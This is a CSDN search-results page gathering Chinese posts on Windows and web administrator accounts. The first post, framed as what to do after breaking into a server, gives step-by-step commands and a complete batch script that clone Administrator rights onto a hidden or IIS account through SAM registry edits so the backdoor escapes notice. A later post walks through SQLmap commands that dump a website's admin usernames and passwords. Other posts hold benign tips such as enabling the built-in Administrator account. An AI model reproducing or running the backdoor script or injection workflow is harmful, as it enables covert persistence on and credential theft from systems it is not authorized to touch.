管理员账号_管理员账号如何切换 - CSDN
精华内容
参与话题
  • Windows下建立隐藏管理员账号

    千次阅读 2011-11-28 00:37:29
    当我们成功的入侵的一台服务器后,我们不能更改原有管理员账号的密码,但是又想给自己留一条后路,怎么办呢,无疑,创建一个隐藏的管理员账号是最好的方法。 建立超级隐藏用户的方法: 我们先来看看要用到的几个...

    出处也找不到了,随便一搜网上一堆。

    当我们成功的入侵的一台服务器后,我们不能更改原有管理员账号的密码,但是又想给自己留一条后路,怎么办呢,无疑,创建一个隐藏的管理员账号是最好的方法。
    建立超级隐藏用户的方法:
    我们先来看看要用到的几个DOS命令 (高手pass)
    1.net命令
    net user user1 123 /add
    这个命令表示创建了一个user1的普通用户,密码是123
    net user user1 /del 
    这个命名表示把它删除
    net localgroup administrators user1 /add
    这个命令表示把user1加入管理员组
    好了,net的用法还有很多,net user 可以查看到现有的用户
    net user 后面加用户名就可以查看该用户的状态
    比如net user user1就可以查看user1的属性
    net user user1 /active:yes/no
    yes是指激活当前用户,no是指禁用当前用户
    好了,就介绍这么多,其他自己去研究吧。现在我们进入正题
    首先,在运行下输入cmd进入命令行
    接着输入net user abc$ /add
    abc是建立的用户名,$符号是表示在dos下面隐藏
    那么就完了吗?输入net user,察看的目录下并没有显示出abc$
    但是你在运行里面输入lusrmgr.msc在用户里面看看(其实就是计算机管理里面的本地用和组),abc$还是存在的,这样的话就达不到超级隐藏的目的了。
    下面我们接着看,如何把它在计算机管理里面隐藏起来。
    于是我们要用到注册表了,在运行里面输入regedt32进入编辑界面
    在下面键值下HKEY_LOCAL_MACHINE\SAM\sam做。默认此处只有system才有权限访问,administrator是没有的。首先我们要编辑它的权限,点sam 然后点窗口上的编辑,在点权限命令,赋予administrator对sam的完全控制权限。如果没有的话,点添加,输入administrator,点确定。好,然后刷新一下。重新打开,这样sam下面就可以展开了。到以下键值
    HKEY_LOCAL_MACHINE\SAM\sam\domains\account\users,展开users,在展开users键值下的names.好了,现在你看到的就是你计算机上面所有的用户。
    你 同样可以看到刚才建立的abc$这个用户。那么users下的键值怎么和names下的键值对应起来呢。你可以点一下administrator这个用 户,看看右边的窗口,你可以发现类型中它的值是0x1f4,好了,对应关键就在这里了。你可以同样点一下guest帐户。看看它的类型,0x1f5。好 了,大概知道了吧。用户名右边的类型和users键值下的项值是对应的。所以找到abc$的类型,并在users上找到它对应的项值。
    下面我 们要做的是,把abc$和administrator做一个克隆,就是我们所说的超级隐藏帐户。点中administrator对应的users中的项 值,就是000001f4,可以看到右边窗口显示出来的F和V这两个二进制值。双击F,展开,然后把里面的内容复制。在切到abc$对应的users下对 应的项值中,同样双击F值,粘贴。好了,下面要做的指是导出键值,把names下面的abc$键值和users下对应的项值分别导出到桌面。点names 下的abc$然后再窗口中点文件选项,然后导出。可以导出到桌面,就命名为1好了。同样的,把users下对应的项值导出。ok,搞定。关闭注册表。 (也可以直接把000001F4导出注册表文件,然后修改注册表文件中第二行的1F4为我们所添加的abc$所对应的数值)

    对于这些命令,我们可以在命令行下完成,导出:regedit.exe /e hacker.reg HKEY_LOCAL_MACHINESAMSAMDomainsaccountusers

    /e 是regedit.exe的参数,在_LOCAL_MACHINESAMSAMDomainsaccountusers这个键的一定要以结尾。必要的情况 下可以用引号将“c:winntregedit.exe /e hacker.reg HKEY_LOCAL_MACHINESAMSAMDomainsaccountusers”引起来。
    修改后导入:regedit.exe /s hacker1.reg

    运行下输入cmd,输入net user abc$ /del命令成功完成。好了,分别双击刚才导出的键值。显示信息已经成功导入。ok,具有管理员权限的超级隐藏帐户就建立好了。
    在cmd下输入net user,在运行里面输入lusrmgr.msc,abc$这个用户就没有了。但是它依然存在,就是不显示而已。
    开 始,注销, ctrl+alt+del多按几下,显示出一个窗口,在用户名中输入abc$密码是空。回车,是不是进去了。怎么样,爽吧。那它是不是有超级管理权限呢? 你自己试试不就知道了。看看可不可以改administrator的密码。运行中输入lusrmgr.msc,点用户选administrator,看看 右键,修改密码,省的麻烦,把它清空吧。密码已经设置。成功。这样一个隐藏得超级用户就建立了。
    说了这么多,不知道你懂了没有,按着慢慢坐吧。但是仍然要告诉你一个事情,就是机器重启的话,abc$这个用户还是会在计算机管理下面显示出来。素以说我觉得真正可以建立隐藏用户的方法是没有的。至少现在我还没有发现。不过好像用软件可以实现。哎,慢慢来吧

    建议:如果对方是有启动IIS的话,最好是克隆IUSER_XXXX的账号,以为估计一般管理员也不会整天去查看这个账号是否是在administrators组,即使重启户也不怕。然后可以长久的保存这个“隐藏”账号了。

    --------------------------------------------------------------------------------

    --------------------------------------------------------------------------------

    本批处理根据服务器的情况,结合自己的研究,使用服务器本地iis帐号IUSR_计算机名,

    设置密码位12345678(可以自己改一下批处理最后一行)。

    这个来复制administrator权限,难以发现与引起怀疑。

    (当然其他帐号也可以,用这个帐号主要通过机器名就能知道自己想要的入侵帐号密码是多少)

    程序代码 程序代码
    echo off
    setlocal enabledelayedexpansion
    echo %computername%
    echo HKEY_LOCAL_MACHINE\SAM\SAM [1 17] >”%windir%\..\1.reg”
    regini “%windir%\..\1.reg”
    regedit /e “%windir%\..\1.reg” HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\IUSR_%computername%
    rem unicode ->ascii
    type “%windir%\..\1.reg” >”%windir%\..\2.reg”
    del /q “%windir%\..\1.reg”
    rem find IUSR_%computername% 的对应id
    for /F “delims=( tokens=1-5* skip=3″ %%a in (%windir%\..\2.reg) do set iusr_id=%%b
    del /q “%windir%\..\2.reg”
    rem export administrator register
    regedit /e “%windir%\..\1.reg” HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users00001F4
    type “%windir%\..\1.reg” >”%windir%\..\2.reg”
    del /q “%windir%\..\1.reg”
    rem replace 1fx->iusr_id
    for /f “tokens=* delims=:” %%i in (%windir%\..\2.reg) do (
    for /f “tokens=*” %%j in (“%%i”) do (
    set TMP=%%j
    set “TMP=!TMP:000001F4=00000%iusr_id:~0,3%!”
    echo !TMP!>>%windir%\..\1.reg
    )
    )
    regedit /s %windir%\..\1.reg
    del /q %windir%\..\1.reg
    del /q %windir%\..\2.reg
    echo HKEY_LOCAL_MACHINE\SAM\SAM [17] >”%windir%\..\1.reg”
    regini “%windir%\..\1.reg”
    del /q “%windir%\..\1.reg”
    net user IUSR_%computername% 12345678


    展开全文
  • Win7安装完成后,由于安装时的设置的原因,也许会造成系统登录到桌面的时候用的是某一个普通账户,此时很多应用因为缺少管理员权限而无法正常加载运行,尤其是有些浏览器插件等等,此时到Windows系统里的计算机管理...

        Win7安装完成后,由于安装时的设置的原因,也许会造成系统登录到桌面的时候用的是某一个普通账户,此时很多应用因为缺少管理员权限而无法正常加载运行,尤其是有些浏览器插件等等,此时到Windows系统里的计算机管理里找,【开始菜单】-【计算机】-右键【管理】,打开计算机管理界面,却没有“本地用户和组”这一项,怎么弄出来这个设置呢?

        选择【开始菜单】,在“搜索程序和文件”里输入“cmd”,先别忙打回车,在弹出的面板在“cmd.exe”上鼠标右键选择“以管理员身份运行”,在黑色的框的控制台界面输入:“net user administrator /active:yes”,打回车运行,系统提示成功后,重启Windows系统,然后切换Administrator账户登录,或者进入桌面后注销,切换到其他账户登录。注意Administrator要预先设置密码,这个是前提,否则还是出不来管理员账户选项。

    展开全文
  • 获取网站管理员账户密码?

    万次阅读 2018-01-24 09:36:53
    最近学长让用sqlmap获取一个网站的管理员账户和密码,一开始就很迷茫啊,毕竟对这些东西不是太了解,,可能是我懂得太少,,后来完成之后才发现是一件很简单的事,毕竟,学长给的是一个容易攻破的网站,,也不算是...

      最近学长让用sqlmap获取一个网站的管理员账户和密码,一开始就很迷茫啊,毕竟对这些东西不是太了解,,可能是我懂得太少,,后来完成之后才发现是一件很简单的事,毕竟,学长给的是一个容易攻破的网站,,也不算是攻破,总之就是入门嘛。

      SQL注入:就是通过把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。

      首先sqlmap据说是一个开源的,很强大的,集检测和利用注入点于一身的工具,有python语言开发,用之前得装python环境。说是有检测功能但是并不能直接扫描网站找到注入点,但是可以批量导入,就是省了你的麻烦。但是说一体化好像牵强了一点。

      至于批量导入这里借用一个大佬的方法,就是借用burpsuite的日志文件批量导入,

        配置burpsuite下记录所有的request记录,并保存在指定文件夹,指定在sqlmap的目录下,然后python sqlmap.py -l 文件名 --batch -smart

      sqlmap就能批量导入burp的log文件了--batch指默认都选yes,,-smart指启发式快速判断,节约时间。

      最后能注入的url会保存到out文件夹下 

      注意:log文件中如果有sqlmap无法读取的字符(ascii码之外的字符)会读取失败。

      找注入点的工具还是啊d名小子啥的比较方便,而且这些工具才真是一体化,感觉比sqlmap简单的多。

      而手工找注入点,,,主要是根据返回值的不同,这里就不说了,有个工具多好(所以说有些人感觉很厉害,可能是人家工具到位,并不一定是技术很强,大佬,请自动忽略)

      既然找到注入点了,一般就不用测试了,但是还是列一下

     sqlmap -u "http://192.168.1.150/products.asp?id=134"  
    因为我这是linux系统所以直接调用,windows:

    C:\Python27\sqlmap>python sqlmap.py -u "http://192.168.1.150/products.asp?id=134"

    一般会扫描出数据库管理器的类型和操作系统啥的

    接下来我就按linux来了。。

      列出数据库

    sqlmap -u http://ooxx.com.tw/star_photo.php?artist_id=11 --dbs

    有时候可能会提示不成功,我学长给我的直接没有数据库,因为acc只有表,,,这就很尴尬,,


    就是说没有数据库,试试只用--tables即列出表名

      

    sqlmap -u http://ooxx.com.tw/star_photo.php?artist_id=11  --tables
    
      如果有数据库的话 加-D 数据库名

    列表名有时候也不会成功,它会提示你是否用常规方法啥的,输y就对了,他用的方法好像是试错法,,具体你一试就知道了。

    接着就是列字段,和列出指定字段了

    sqlmap -u http://ooxx.com.tw/star_photo.php?artist_id=11 -D vhost -T admin --column
    sqlmap -u http://ooxx.com.tw/star_photo.php?artist_id=11 -D vhost -T admin -C username,password --dump
      导出后密码一般都不是明文,MD5啥的加密。。完事

       至于后来用御剑啥的扫描登陆啥的就简单了

      sqlmap命令补充:

       参数:

      --current-db列出当前使用数据库

      --current-user当前用户

      --user 列出所有用户

      --password列出密码


    PS:批量导入大佬的原文https://www.cnblogs.com/qmfsun/p/5654192.html

    展开全文
  • 最近手贱,不小心把mbp仅有的管理员账号设置成了普通用户,想重新改回管理员,竟然需要用其他管理员账号去更改。简直 那个 啥 ~ 下面将提供创建一个新的管理员账号的方案 不仅适用于上述我出现的问题,也适用于...

    转载请标明出处:http://blog.csdn.net/donkor_/article/details/78563515

    前言

    最近手贱,不小心把mbp仅有的管理员账号设置成了普通用户,想重新改回管理员,竟然需要用其他管理员账号去更改。简直 那个 啥 ~

    下面将提供创建一个新的管理员账号的方案

    不仅适用于上述我出现的问题,也适用于那些忘记了登录账号密码的同学 ~

    ▲ 解决方案 :

    使用命令来重新建一个账户登录并更改原先的账号密码或账户权限,不会丢失原先账号的文件

    1、在电脑刚启动时,请按下键盘上的 command+s 组合键不动,进入单一用户模式

    2、输入 sbin/mount -uaw , 我们需要安装硬盘驱动器(we need to mount the hard drive),然后回车

    3、输入 rm/var/db/.AppleSetupDone , 删除系统当前的配置文件 ,然后回车

    4、输入 reboot ,然后回车 ,电脑就会重启

    接下来我们就可以看到重新配置系统的界面,就是跟当初才激活电脑一样。随后根据激活配置提示,一步一步重新配置就好。在此过程中会要求我们重新再创建一个新的管理员账号,当完成以后,系统会重新配置,然后就可以进入 Mac 系统了。


    About me
    Email :donkor@yeah.net
    Android开发交流QQ群 : 537891203
    Android开发交流群

    展开全文
  • gogs 默认的管理员账号与密码是什么

    千次阅读 2019-09-13 17:40:08
    这里描述均为0.11.91版本 问:gogs安装完成后账认的管理员账号与密码是什么? 答:默认的管理员账号与密码是你注册的第一个账号,就是安装完成后你的第一个账号就是管理员,同时也有普通账号的功能 好简单! ...
  • 注册管理员账号

    2020-05-23 15:46:06
    在上一节中执行query和invote前,必须要先注册管理员,因此本节我们重点来讲解下注册管理员的代码 打开$GOPATH/src/github.com/hyperledger/fabric-samples/fabcar/javascript/enrollAdmin.js文件,我们来看看代码...
  • ubuntu 添加管理员账号

    万次阅读 2012-11-19 19:49:58
    Ubuntu 默认只有安装时候的那个账号是系统管理员账号,也不会给出root用户权限。 在管理员账号下,用passwd命令给root一个密码,就可以使用root了。 但是,使用useradd时候,如果不加参数,添加的为普通账号。 ...
  • 多个管理员账号2.管理员帐号改名3.陷阱帐号 1.多个管理员账号 创建一个一般用户权限帐号用来处理电子邮件以及处理一些日常事物,另一个拥有Administrator权限的帐户只在需要的时候使用。 因为只要登录系统以后,密码...
  • GitLab 部署及管理员账号初始化

    万次阅读 2018-05-31 07:06:16
    至于GitLab 部署网上已有大篇幅的资料,但个人都是试了很久才成功的,以此篇博客记录下来,方便自己提心别人环境:centos 7 gitlab version: 1、cd /home1、下载rpm安装包 :...
  • 在WIN7中安装完时会设定一个账号a,若后面新建一个标准账号b(非管理员),则删除掉账号a后,使用账号b登录,无法获得管理员账号权限。 涉及到管理员权限时,提示输入管理员密码,但想输管理员密码的地方都没有,...
  • mysql设置管理员账号

    千次阅读 2017-08-20 01:47:20
    mysql设置管理员账号 命令: mysqladmin -u root password root
  • CMD命令(添加删除管理员账户

    千次阅读 2015-08-20 10:16:51
    CMD命令(添加删除管理员账户
  • 本文是假设你已经部署好数据库环境了的 废话不多说直接贴代码 > mongo MongoDB shell version v3.6.1 connecting to: mongodb://127.0.0.1:27017 MongoDB server version: 3.6.1 ...2018-09-12T22:30:47.472...
  • 和Win7/Win8.1一样,Win10的管理员账户Administrator是默认隐藏和关闭的,因为该账户权限极高,被不法分子利用后存在极大风险。但如果你想在某些特殊情况下使用该账户,就需要手动将其开启,并且最好在使用之后及时...
  • Oracle使用管理员账户登录

    千次阅读 2018-10-10 10:44:22
    在校学习Oracle数据库时没有注意过这些细节抑或是时间太久没操作已经忘却了,昨天尝试本地建库使用nifi时发现scott账户被放开以后可以登录但是sys和system两个管理员账户在sqlplus和navicat上都无法登录,后来查阅...
  • Ubuntu如何新增管理员账户

    千次阅读 2017-01-17 15:18:37
    然后希望重新建立一个与leowang一样的账户。 1. 命令选择:adduser和useradd可用, 选择adduser。因为据网络资料显示,useradd不能在/home目录下建立同名目录, 顺便说句,useradd默认的shell不是bash; 2. 建立账户...
  • 在#root>下输入以下4条命令(如果看到bash-3.2#是一样的): fsck -y mount -uaw / rm /var/db/.AppleSetupDone reboot
  • 注册hustoj管理员账号

    千次阅读 2017-07-30 16:05:17
    注册hustoj管理员账号 1. 现在oj中注册一账号(例如:账户名为admin),然后设置管理员权限 2. 输入命令:sudo su 回车,输入root账户密码 3. 输入命令:mysql –uroot –p 回车 #以mysql的管理员权限进入 4. ...
  • Django 管理后台创建管理员账号

    千次阅读 2018-07-11 18:29:12
    运行django-admin startproject mysite命令,Django就会创建并配置默认的管理后台,这时我们可以创建一个管理员用户(超级用户),登录管理后台,创建这个用户的步骤如下:1. 进入刚才创建的mysite目录2.执行 python...
  • XP系统一般情况下在装完系统后会有一个计算机管理员权限的用户,以后登陆时就显示这个用户,而看不到 Administrator账户,并且进入XP系统后在控制面板中的用户账户下看不到Administrator用户,就好象丢失了一样,...
1 2 3 4 5 ... 20
收藏数 172,360
精华内容 68,944
关键字:

管理员账号